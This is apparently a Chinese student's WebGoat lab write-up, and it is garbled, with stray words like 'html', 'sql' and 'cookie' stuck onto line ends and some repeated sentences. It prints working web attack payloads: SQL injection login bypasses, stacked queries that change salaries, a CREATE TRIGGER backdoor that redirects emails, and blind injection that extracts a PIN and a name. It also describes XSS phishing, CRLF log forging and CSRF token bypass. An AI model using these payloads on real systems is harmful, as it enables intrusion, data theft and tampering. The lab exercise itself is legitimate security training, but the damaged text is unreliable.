將原語句修改成:SELECT * FROM weather_data WHERE station = 101 OR 1=1html
因爲1=1恆成立,點擊go,看到全部城市的天氣,成功。前端
其中%0d和%0a爲CRLF換行符,看到的輸出爲java
第二行就是咱們剛剛僞造出來的web
cc' or 1=1 or 'a'='a正則表達式
SELECT * FROM user_data WHERE last_name = 'cc' OR '1'='1'sql
以用戶Neville登陸,在密碼欄中輸入' or 1=1 --永真式進行SQL注入,可是發現登陸失敗。發現password的最大長度爲8,更改最大長度,將其改成100瀏覽器
再次登陸,成功安全
由於刷新了網頁咱們須要從新修改最大字符長度服務器
將value值改成101 or 1=1 order by salary desc,這樣老闆的信息就會被排到第一個cookie
點擊ViewProfile進去,便可查看老闆的詳細信息
圖
輸入注入語句:101; update employee set salary=65000,
101;CREATE TRIGGER yqhBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email='20154322@qq.com' WHERE userid = NEW.userid建立一個後門,把表中全部的郵箱和用戶ID都設爲個人。
先輸入101 AND ((SELECT pin FROM pins WHERE cc_number='1111222233334444') > 4000);,結果是
Account number is valid.帳戶有效,再試試先輸入101 AND ((SELECT pin FROM pins WHERE cc_number='1111222233334444') > 4000);,結果是
Account number is valid.帳戶有效,再試試
利用二分法,屢次嘗試,找到數字爲2364
輸入101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), 1, 1) >'z' );進行猜解,發現結果爲Account number is valid,帳戶有效。再往大寫的字母猜想,最終肯定首字母爲J
重複上述步驟,最終肯定用戶名爲「Jill」
使用XSS和HTML插入製做一個釣魚網站,將其輸在search框中,代碼以下:
輸入後下拉網頁,會有用戶名和密碼的框出現,隨意輸入用戶名和密碼
成功
輸入帶有攻擊性的URL,如,就會彈出對話框
在 Message裏輸入
在Title輸入:20154328,在Message輸入:
點擊「Submit」,在Message List下出現一條提交的記錄,以下圖所示:
在Title輸入:20154328;在Message輸入:
以下圖所示:
在Message輸入構造的代碼
擊Submit,而後在Message List裏點擊「CSRF Token By-Pass Attack」,以下圖所示: